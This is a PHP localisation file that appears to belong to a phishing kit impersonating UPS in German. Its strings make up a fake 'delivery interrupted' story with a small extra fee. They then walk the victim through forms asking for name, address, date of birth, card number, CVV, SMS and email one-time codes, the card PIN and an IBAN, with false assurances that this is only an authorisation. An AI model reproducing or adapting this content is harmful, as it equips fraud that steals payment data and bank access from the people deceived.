<?php
function lang($phrase){
	static $lang = array(

                "xlang" => "DE",
                "xcapt1" => "Bitte aktivieren Sie das CAPTCHA-Feld.",
                "xcapt2" => "Verifizierung",
                "xcapt3" => "Weiter",
                "xfot1" => "Diese Website",
                "xfot2" => "Andere UPS Websites",
                "xfot3" => "Verbinden Sie sich mit uns",
                "xfot4" => "Rechtliches",
                "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. All rights reserved. ",
                "xind1" => "Sendungsverfolgung",
                "xind2" => "Sendungsverfolgungsnummer",
                "xind3" => "Fehler : Bitte geben Sie die richtige Trackingnummer an.",
                "xind4" => "Brauchen Sie Hilfe bei der Änderung Ihrer Lieferung?",
                "xind5" => "Angebot",
                "xind6" => "Versand",
                "xind7" => "Rechnungsstellung",
                "xind8" => "Hilfe anfordern",
                "xexp1" => "Lieferung unterbrochen",
                "xexp2" => "Sendungsverfolgung",
                "xexp3" => "Ihre letzte Lieferung wurde unterbrochen. Sie wird derzeit im Sortierzentrum zurückgehalten.",
                "xexp4" => "Das an Sie gesendete Paket hat das angegebene Gewicht nicht eingehalten, und Sie werden aufgefordert, eine zusätzliche Gebühr zu zahlen, um sicherzustellen, dass Ihr Paket korrekt zugestellt wird",
                "xexp5" => "Die Gebühr beträgt 0,48€",
                "xexp6" => "Um zu bezahlen, klicken Sie bitte auf die Schaltfläche unten",
                'xexp7' => "Bezahlen",
                "xexp8" => "Sobald die Gebühr bezahlt ist, wird Ihr Paket so schnell wie möglich an die Lieferadresse weitergeleitet.",
                "xexp9" => "Wird die Gebühr nicht innerhalb von 48 Stunden bezahlt, wird das Paket an den Absender zurückgeschickt.",
                "xexp10" => "Sendungsverfolgung nach Referenznummer",
                "xexp11" => "Sendungsverfolgungsnummern importieren",
                "xexp12" => "Andere Sendungsverfolgung",
                "xinfz1" => "Bestätigen Sie Ihre Rechnungsdaten",
                "xinfz10" => "Geburtsdatum",
                "xinfz2" => "Vollständiger Name",
                "xinfz3" => "Land",
                "xinfz4" => "Ort",
                "xinfz5" => "Anschrift",
                "xinfz6" => "Telefon",
                "xinfz7" => "Postleitzahl",
                "xinfz8" => "Fehler : Alle Daten sind erforderlich",
                "xinfz9" => "Bestätigen",
                "xpay1" => "Zahlungsdaten",
                "xpay2" => "Sehr geehrter Kunde, überprüfen Sie Ihre Zahlungsdaten korrekt und stimmen Sie Ihre Kartendaten zum Abschluss ab",
                "xpay3" => "Name auf der Karte",
                "xpay4" => "Kartennummer",
                "xpay5" => "Verfallsdatum",
                "xpay6" => "Sicherheitscode CVV (3-stellig)",
                "xpay7" => "Fehler : Alle Daten sind erforderlich",
                "xpay8" => "Bestätigen",
                "xsms1" => "Überprüfung",
                "xsms2" => "Wir haben einen Bestätigungscode an Ihre Nummer gesendet.",
                "xsms3" => "OTP-Code",
                "xsms4" => "Fehler: Falscher OTP-Code",
                "xsms5" => "Dieser Schritt ist erforderlich, um Ihren Zahlungsvorgang sicher abzuschließen.",
                "xsms6" => "UPS führt eine vorübergehende Authentifizierung Ihrer Karte durch, um sie zu überprüfen. Es handelt sich hierbei nur um eine Autorisierung und NICHT um eine Gebühr.",
                "xsms7" => "Bestätigen",
                "xconf1" => "Wiederaufnahme der Zustellung",
                "xconf2" => "Die Zahlung der zusätzlichen Kosten wurde berücksichtigt.",
                "xconf3" => "Ihr Paket sollte innerhalb der nächsten 24 Stunden ankommen.",
                "xconf4" => "Bestätigen",
                "xpin1" => "Verifizierung",
                "xpin2" => "Geben Sie den Pin-Code für Ihre Bankkarte ein",
                "xpin3" => "Pin-Code",
                "xpin4" => "(4 Ziffern)",
                "xpin5" => "Dieser Schritt ist erforderlich, um Ihren Zahlungsvorgang sicher abzuschließen",
                "xpin6" => "UPS führt eine vorübergehende Überprüfung Ihrer Karte durch, um sie zu verifizieren. Es handelt sich hierbei nur um eine Autorisierung und NICHT um eine Gebühr.",
                "xpin7" => "Bestätigen",
                "xmail1" => "Verifizierung",
                "xmail2" => "Wir haben einen Bestätigungscode an Ihre E-Mail geschickt",
                "xmail3" => "E-Mail-Code",
                "xmail4" => "(6 Ziffern)",
                "xmail5" => "Dieser Schritt ist erforderlich, um Ihren Zahlungsvorgang sicher abzuschließen",
                "xmail6" => "UPS führt eine vorübergehende Überprüfung Ihrer Karte durch, um sie zu verifizieren. Es handelt sich hierbei nur um eine Autorisierung und NICHT um eine Gebühr.",
                "xmail7" => "Bestätigen",
                "xiban1" => "Verifizierung",
                "xiban2" => "Bitte geben Sie Ihre IBAN ein, um die Zahlung abzuschließen",
                "xiban3" => "IBAN",
                "xiban4" => "(IBAN)",
                "xiban5" => "Dieser Schritt ist erforderlich, um Ihren Zahlungsvorgang sicher abzuschließen.",
                "xiban6" => "UPS führt eine vorübergehende Überprüfung Ihrer Karte durch, um sie zu verifizieren. Es handelt sich hierbei nur um eine Autorisierung und NICHT um eine Gebühr.",
                "xiban7" => "Bestätigen"
	);	
	
	return $lang[$phrase];
}
 ?>